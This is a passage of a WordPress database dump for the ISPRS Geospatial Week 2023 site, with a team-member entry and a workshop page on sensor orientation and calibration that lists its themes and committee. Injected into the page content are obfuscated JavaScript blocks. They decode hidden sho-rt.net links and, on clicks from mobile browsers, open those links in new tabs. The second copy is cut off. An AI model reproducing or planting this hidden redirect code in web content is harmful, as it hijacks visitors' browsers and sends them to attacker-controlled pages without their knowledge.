_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Henry Meißner','','publish','closed','closed','','henry-meisner','','','2022-11-09 22:39:57','2022-11-09 22:39:57','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3264',0,'dt_team','',0),
(3265,1,'2022-11-09 22:39:36','2022-11-09 22:39:36','','w212','','inherit','open','closed','','w212','','','2022-11-09 22:39:36','2022-11-09 22:39:36','',3264,'https://gsw2023.com/wp-content/uploads/2022/11/w212.jpg',0,'attachment','image/jpeg',0),
(3266,1,'2022-11-09 22:41:23','2022-11-09 22:41:23','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3267\" img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</span></strong></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>Chairs</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"59\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the event:</u></strong></h5>\r\n<ul>\r\n 	<li><strong>State-of-the-art in orientation approaches of multi-sensor systems</strong></li>\r\n 	<li><strong>New calibration methods of mobile mapping platforms and systems for mapping and navigation purposes</strong></li>\r\n 	<li><strong>Challenges in aerial sensors calibration and orientation</strong></li>\r\n 	<li><strong>Testing new sensors and systems available in the market using the field-based and laboratory approaches</strong></li>\r\n 	<li><strong>Validation of satellite sensors in spectral and spatial quality, including testing micro- and nanosatellites</strong></li>\r\n 	<li><strong>Concepts of test fields for calibration of sensors, including the possibilities for aerial, low-altitude and terrestrial sensors</strong></li>\r\n 	<li><strong>New validation methods and case studies of photogrammetric and lidar sensors mainly referred to low-cost devices (i.e. hand scanners, smartphones)</strong></li>\r\n 	<li><strong>Sensors benchmarking – concepts and examples</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee: (to be announced)</u></strong></h5>\r\n<ul>\r\n 	<li><strong>Khrystyna Burshtynska, Lviv Polytechnic National University, Ukraine</strong></li>\r\n 	<li><strong>Michael Cramer, University of Stuttgart, Germany</strong></li>\r\n 	<li><strong>Dorota Iwaszczuk, Technical University of Darmstadt, Germany</strong></li>\r\n 	<li><strong>Zdzisław Kurczyński, Warsaw University of Technology, Poland</strong></li>\r\n 	<li><strong>Jon Mills, Newcastle University, United Kingdom</strong></li>\r\n 	<li><strong>Fabio Remondino, Bruno Kessler Foundation FBK, Italy</strong></li>\r\n 	<li><strong>Jan Skaloud, Swiss Federal Institute of Technology EPFL, Switzerland</strong></li>\r\n 	<li><strong>Guo Zhang, Wuhan University, China</strong></li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','publish','closed','closed','','soc-sensor-orientation-and-calibration-for-mapping-and-navigation-purposes','','','2023-02-05 14:41:00','2023-02-05 14:41:00','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3266',0,'dt_portfolio','',0),
(3267,1,'2022-11-09 22:41:00','2022-11-09 22:41:00','','w21m','','inherit','open','closed','','w21m','','','2022-11-09 22:41:00','2022-11-09 22:41:00','',3266,'https://gsw2023.com/wp-content/uploads/2022/11/w21m.jpg',0,'attachment','image/jpeg',0),
(3268,1,'2022-11-09 22:41:23','2022-11-09 22:41:23','','<strong>SO&amp;C: Sensor orientation and calibration for mapping and navigation purposes</strong>','','inherit','closed','closed','','3266-revision-v1','','','2022-11-09 22:41:23','2022-11-09 22:41:23','',3266,'https://gsw2023.com/?p=3268',0,'revision','',0),
(3269,1,'2022-11-09 22:46:15','2022-11-09 22:46:15','','w21m','','inherit','open','closed','','w21m-2','','','2022-11-09 22:46:15','2022-11-09 22:46:15','',3266,'https://gsw2023.com/wp-content/uploads/2022/11/w21m-1.jpg',0,'attachment','image/jpeg',0),
(3270,1,'2022-11-09 22:46:44','2022-11-09 22:46:44','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 